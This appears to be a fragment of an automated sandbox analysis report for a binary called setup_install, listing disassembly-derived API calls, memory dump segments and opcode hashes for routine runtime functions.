                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: _errno$Process$CloseCurrentErrorHandleLastOpen
                                        • String ID:
                                        • API String ID: 1444142086-0
                                        • Opcode ID: 35796f80068f4f09fba722cf61b49730b32969ba8f55944c5feff680450829d9
                                        • Instruction ID: 357e0e951a0f0153f5a2a03bb664550280ea092aedc4a642048f84f4c00ed357
                                        • Opcode Fuzzy Hash: 35796f80068f4f09fba722cf61b49730b32969ba8f55944c5feff680450829d9
                                        • Instruction Fuzzy Hash: 13113C7068C2098FEB00BF79D98870A7FA9FB46715FA04668E825C6280EB71C450CF52
                                        APIs
                                          • Part of subcall function 64941A70: EnterCriticalSection.KERNEL32 ref: 64941A84
                                          • Part of subcall function 64941A70: LeaveCriticalSection.KERNEL32 ref: 64941AAB
                                        • CloseHandle.KERNEL32 ref: 64942468
                                        • CloseHandle.KERNEL32 ref: 64942473
                                        • LeaveCriticalSection.KERNEL32 ref: 6494247E
                                        • DeleteCriticalSection.KERNEL32 ref: 64942490
                                        • DeleteCriticalSection.KERNEL32 ref: 6494249B
                                        • DeleteCriticalSection.KERNEL32 ref: 649424A6
                                        • free.MSVCRT ref: 649424B4
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Delete$CloseHandleLeave$Enterfree
                                        • String ID:
                                        • API String ID: 2365459708-0
                                        • Opcode ID: b2e54ad497030685eb8f430f96036894510ccd61e6e303160f30dab636b153cb
                                        • Instruction ID: e4d0f767930242d14d9f140bdae61370ffb6b9dfd869e63967bd870cf6bbd697
                                        • Opcode Fuzzy Hash: b2e54ad497030685eb8f430f96036894510ccd61e6e303160f30dab636b153cb
                                        • Instruction Fuzzy Hash: 1F01B0B6A486048FDB00BFBDE5845ADBBF4EF95310F120969D8859B314E734E859CF82
                                        APIs
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443A0
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443D9
                                        • fprintf.MSVCRT ref: 64942DBC
                                        • exit.MSVCRT ref: 64942DC8
                                          • Part of subcall function 649442C0: Sleep.KERNEL32(?,?,?,?,?,?,649432B2,?,?,?,?,649433EF,00000000,64944CE0), ref: 649442F8
                                        Strings
                                        • ../../src/winpthreads/src/mutex.c, xrefs: 64942D9E
                                        • Assertion failed: (%s), file %s, line %d, xrefs: 64942DB1
                                        • ., xrefs: 64942D96
                                        • (m_->valid == LIFE_MUTEX) && (m_->busy > 0), xrefs: 64942DA6
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Sleep$exitfprintf
                                        • String ID: (m_->valid == LIFE_MUTEX) && (m_->busy > 0)$.$../../src/winpthreads/src/mutex.c$Assertion failed: (%s), file %s, line %d
                                        • API String ID: 24197342-167680671
                                        • Opcode ID: 2a1a87fcbea5f533f3c7bf2cdf43afd599c0b5f4ada067f7f73fef34ede2514e
                                        • Instruction ID: 4aba806da49f89240c60b9a25d1a7dee6be729d2f5a8f18e51f839b6aae9a212
                                        • Opcode Fuzzy Hash: 2a1a87fcbea5f533f3c7bf2cdf43afd599c0b5f4ada067f7f73fef34ede2514e
                                        • Instruction Fuzzy Hash: 8C01F6B5688311DBEB15EF24E58160ABBE4BB95348F058959E888CB319D370D894CB53
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memmove$memcpy
                                        • String ID:
                                        • API String ID: 3033661859-0
                                        • Opcode ID: f41e843d43a0eeaef59bcf24db1e08d837a31bdf54fb2eec86d79bb60b35a7a0
                                        • Instruction ID: dcf836f1785cbb93a3de1e3eea0110dc893824053c3af87d4a1e44953c41eae0
                                        • Opcode Fuzzy Hash: f41e843d43a0eeaef59bcf24db1e08d837a31bdf54fb2eec86d79bb60b35a7a0
                                        • Instruction Fuzzy Hash: 2291E3759093118BC754EF28C18046EBBE1FF8A704F158C2EF98597324E739E895CB9A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memmove$memcpy
                                        • String ID:
                                        • API String ID: 3033661859-0
                                        • Opcode ID: f0e4a1917a5d97b120202294713ef431dfab8b06330f5f16d5753bb4d5dcb9fb
                                        • Instruction ID: 87f5d2545a6ca0b03ba28ee0523edafa10f84fb2297b9de1022d2ddf20a7a980
                                        • Opcode Fuzzy Hash: f0e4a1917a5d97b120202294713ef431dfab8b06330f5f16d5753bb4d5dcb9fb
                                        • Instruction Fuzzy Hash: 528116719097908FC301EF28C09052EFBE1BF89B45F148D5EE4C897312D678EA85DB86
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: _errno_fileno_lseeki64
                                        • String ID:
                                        • API String ID: 1152433503-0
                                        • Opcode ID: 3e8d69dbfdde61e65ea1d725896c537663441bcb1e748483c4fd908bca001767
                                        • Instruction ID: ebfcf62a9414a9ceabab88c7ed59cd3fa5b1dd0921d3db538ec35c4d2a8e784b
                                        • Opcode Fuzzy Hash: 3e8d69dbfdde61e65ea1d725896c537663441bcb1e748483c4fd908bca001767
                                        • Instruction Fuzzy Hash: 2C915D716083118FC710CF18C58075BBBE1BFC8754F198A5EE8989B351D3B5E989CB96
                                        APIs
                                        • GetLastError.KERNEL32 ref: 64945439
                                          • Part of subcall function 64944E00: TlsGetValue.KERNEL32 ref: 64944E3B
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443A0
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443D9
                                        • SetLastError.KERNEL32 ref: 6494547D
                                        • realloc.MSVCRT ref: 649454A7
                                        • realloc.MSVCRT ref: 649454BD
                                        • memset.MSVCRT ref: 649454EB
                                        • memset.MSVCRT ref: 64945509
                                          • Part of subcall function 649442C0: Sleep.KERNEL32(?,?,?,?,?,?,649432B2,?,?,?,?,649433EF,00000000,64944CE0), ref: 649442F8
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Sleep$ErrorLastmemsetrealloc$Value
                                        • String ID:
                                        • API String ID: 2283913283-0
                                        • Opcode ID: 29924c0cec7f9c1b97b2a3b07278f7db75e3e6a7a15f6061b0f5bb9257cd6a5e
                                        • Instruction ID: e749575d6f3396a8bd972d71088d537f833ff07f18f1dbfd7086c7d2c8bc232d
                                        • Opcode Fuzzy Hash: 29924c0cec7f9c1b97b2a3b07278f7db75e3e6a7a15f6061b0f5bb9257cd6a5e
                                        • Instruction Fuzzy Hash: C33135B4A482148FDB10DFA8D48469DBBF5FF88314F11856AE948DB305D734E940CF91
                                        APIs
                                        • pthread_once.LIBWINPTHREAD-1 ref: 00411006
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 00411012
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00411081
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_mutex_lockpthread_mutex_unlockpthread_once
                                        • String ID:
                                        • API String ID: 3726264613-0
                                        • Opcode ID: 389acb5a3875232dfac94150f2ce74748c7301f679ac0e6c0fa75785274f7b5e
                                        • Instruction ID: 1561e78fa5ec91c0c74266f4cf36cfd96f00dd1589e0292ea51b72573b3d25dc
                                        • Opcode Fuzzy Hash: 389acb5a3875232dfac94150f2ce74748c7301f679ac0e6c0fa75785274f7b5e
                                        • Instruction Fuzzy Hash: 7D217171A08381CFCB14DF55D4C06ABBFE4AB49354F05846FEA844B726C778E8C58B6A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: _errno_filelengthi64_filenofflushfgetposfsetpos
                                        • String ID:
                                        • API String ID: 4183758535-0
                                        • Opcode ID: 3a8db24a24652df49a7dd3926f6c8e15cf24a093d281d193550af0be8360b953
                                        • Instruction ID: c8421b0909eb61effec7e16545f80ae01fbb70023316934024187565de276744
                                        • Opcode Fuzzy Hash: 3a8db24a24652df49a7dd3926f6c8e15cf24a093d281d193550af0be8360b953
                                        • Instruction Fuzzy Hash: C0116AB1A087048BC310AF2A8A8109FBBE4EFD5364F14491FF89083261E37999D5CFD6
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: setlocale$memcpystrlenwcsftime
                                        • String ID:
                                        • API String ID: 3412479102-0
                                        • Opcode ID: 8bcf1e0409a426779bc0b4336c5919611b323013ce8852c1e2b0434524578bda
                                        • Instruction ID: 68a8b9f67b603b6b09b1dc660721eb38201e09b22ba216dd8d83e9e81b4a473f
                                        • Opcode Fuzzy Hash: 8bcf1e0409a426779bc0b4336c5919611b323013ce8852c1e2b0434524578bda
                                        • Instruction Fuzzy Hash: F31196B05097049FC740AF6AC58565FBBE4EF88754F41882EF5C887312E77898809B96
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: setlocale$memcpystrftimestrlen
                                        • String ID:
                                        • API String ID: 1843691881-0
                                        • Opcode ID: 9403e5def275ba0b8540ecb2bb33aa4401a2af8177eae152ad3c8d85c52fb55f
                                        • Instruction ID: 9fa99a6fed446b8ef44ffb222bdee63a05996e6373abd8e18ae67517507b43b8
                                        • Opcode Fuzzy Hash: 9403e5def275ba0b8540ecb2bb33aa4401a2af8177eae152ad3c8d85c52fb55f
                                        • Instruction Fuzzy Hash: 4711D3B0509704AFC740AF69D185B5FBBE4EF88354F81882EF5C887312E77898808B96
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: _errno$fflush
                                        • String ID:
                                        • API String ID: 3480992530-0
                                        • Opcode ID: df87191ea9b3f795a1bff5663397f0fd10b925e813985b099d6b1edb9c8595f1
                                        • Instruction ID: 6a8925a3a0bf5984e5828f8074cd4c62f725c93742b8e1f22d23ff8213994aed
                                        • Opcode Fuzzy Hash: df87191ea9b3f795a1bff5663397f0fd10b925e813985b099d6b1edb9c8595f1
                                        • Instruction Fuzzy Hash: EAF0AF722046149FC7117F6EAC44617FBD8EFA1725F4600BBE944CB321E63598048BB7
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CloseHandleValue
                                        • String ID:
                                        • API String ID: 492146193-0
                                        • Opcode ID: 0cec09cb84d1321a74f41817f8a73f39845058d0ffcf786624025ef096e8d7e6
                                        • Instruction ID: bbd8e6d3a573a2771462347b6a3c7fe5a6cd6c1b33bd62fb3846026ebd56962b
                                        • Opcode Fuzzy Hash: 0cec09cb84d1321a74f41817f8a73f39845058d0ffcf786624025ef096e8d7e6
                                        • Instruction Fuzzy Hash: D451E2B49442048FEB40EFB8D588B9ABBF8EB14324F4045A9DE54CB249E774D994CB92
                                        APIs
                                        • pthread_once.LIBWINPTHREAD-1 ref: 004112CE
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 004112DA
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 0041135E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_mutex_lockpthread_mutex_unlockpthread_once
                                        • String ID: <sI
                                        • API String ID: 3726264613-3642889959
                                        • Opcode ID: 823439ae370b6d9e8dd99fd493ccd695e53b66accd617e7d5f901c134a067028
                                        • Instruction ID: e715b7580858df6ff038ecce1a2212f6f3e894c3c45dde0033b5df1526f4bedf
                                        • Opcode Fuzzy Hash: 823439ae370b6d9e8dd99fd493ccd695e53b66accd617e7d5f901c134a067028
                                        • Instruction Fuzzy Hash: 1E31807060834E8F9710EF6AD8805DBBBE4AB44714F00842FED588B715E778E8C58B9E
                                        APIs
                                        • memcpy.MSVCRT ref: 0044AB91
                                        • memchr.MSVCRT ref: 0044ABB5
                                          • Part of subcall function 00482790: pthread_once.LIBWINPTHREAD-1(?,?,?,?,00427A14), ref: 004827A2
                                          • Part of subcall function 00491410: setlocale.MSVCRT ref: 0049142A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memchrmemcpypthread_oncesetlocale
                                        • String ID: -$.
                                        • API String ID: 3643807795-3807043784
                                        • Opcode ID: 6372df029f19df60a0bbe571758595a36adb2cbb82d87d2135b5c635555398c9
                                        • Instruction ID: 9536ce24123eb485ffeace566dcec9c8a6c6153940544d0955b857e649918632
                                        • Opcode Fuzzy Hash: 6372df029f19df60a0bbe571758595a36adb2cbb82d87d2135b5c635555398c9
                                        • Instruction Fuzzy Hash: 76D135B1D043598FDB04EFA9C08059EBBF1BF88304F14896EE8A4A7355D738E955CB86
                                        APIs
                                        • memcpy.MSVCRT ref: 0044AFFB
                                        • memchr.MSVCRT ref: 0044B01F
                                          • Part of subcall function 00482790: pthread_once.LIBWINPTHREAD-1(?,?,?,?,00427A14), ref: 004827A2
                                          • Part of subcall function 00491410: setlocale.MSVCRT ref: 0049142A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
